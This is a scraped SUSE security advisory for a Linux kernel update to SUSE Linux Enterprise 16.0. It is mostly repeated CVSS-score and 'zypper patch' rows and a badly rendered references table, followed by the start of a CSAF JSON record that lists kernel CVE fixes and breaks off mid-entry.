5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.8 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThe SUSE Linux Enterprise 16.0 and SL MIxro 6.2 kernel was updated to fix various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-40147: blk-throttle: fix access race during throttle policy activation (bsc#1253344).\n- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).\n- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).\n- CVE-2025-40261: nvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).\n- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).\n- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).\n- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).\n- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).\n- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).\n- CVE-2025-68211: ksm: use range-walk function to jump over holes in scan_get_next_rmap_item (bsc#1255319).\n- CVE-2025-68218: nvme-multipath: fix lockdep WARN due to partition scan work (bsc#1255245).\n- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).\n- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).\n- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).\n- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).\n- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).\n- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).\n- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).\n- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).\n- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).\n- CVE-2025-68341: veth: reduce XDP no_direct return section to fix race (bsc#1255506).\n- CVE-2025-68348: block: fix memory leak in __blkdev_issue_zero_pages (bsc#1255694).\n- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).\n- CVE-2025-68356: gfs2: Prevent recursive memory reclaim (bsc#1255593).\n- CVE-2025-68359: btrfs: fix double free of qgroup record after failure to add delayed ref head (bsc#1255542).\n- CVE-2025-68360: wifi: mt76: wed: use proper wed reference in mt76 wed driver callabacks (bsc#1255536).\n- CVE-2025-68361: erofs: limit the level of fs stacking for file-backed mounts (bsc#1255526).\n- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).\n- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).\n- CVE-2025-68368: md: init bioset in mddev_init (bsc#1255527).\n- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).\n- CVE-2025-68374: md: fix rcu protection in md_wakeup_thread (bsc#1255530).\n- CVE-2025-68376: coresight: ETR: Fix ETR buffer use-after-free issue (bsc#1255529).\n- CVE-2025-68379: RDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure (bsc#1255695).\n- CVE-2025-68735: drm/panthor: Prevent potential UAF in group creation (bsc#1255811).\n- CVE-2025-68741: scsi: qla2xxx: Fix improper freeing of purex item (bsc#1255703).\n- CVE-2025-68743: mshv: Fix create memory region overlap check (bsc#1255708).\n- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).\n- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).\n- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).\n- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).\n- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).\n- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).\n- CVE-2025-68784: xfs: fix a UAF problem in xattr repair (bsc#1256793).\n- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).\n- CVE-2025-68792: tpm2-sessions: Fix out of range indexing in name_size (bsc#1256656).\n- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).\n- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).\n- CVE-2025-68799: caif: fix integer underflow in cffrml_receive() (bsc#1256643).\n- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).\n- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).\n- CVE-2025-68803: NFSD: NFSv4 file creation neglects setting ACL (bsc#1256770).\n- CVE-2025-68811: svcrdma: use rc_pageoff for memcpy byte offset (bsc#1256677).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).\n- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).\n- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).\n- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).\n- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).\n- CVE-2025-68821: fuse: fix readahead reclaim deadlock (bsc#1256667).\n- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).\n- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).\n- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).\n- CVE-2025-71080: ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT (bsc#1256608).\n- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).\n- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).\n- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).\n- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).\n- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).\n- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).\n- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).\n- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).\n- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).\n- CVE-2025-71098: ip6_gre: make ip6gre_header() robust (bsc#1256591).\n- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).\n- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).\n- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).\n- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).\n- CVE-2025-71126: mptcp: avoid deadlock on fallback while reinjecting (bsc#1256755).\n- CVE-2025-71132: smc91x: fix broken irq-context in 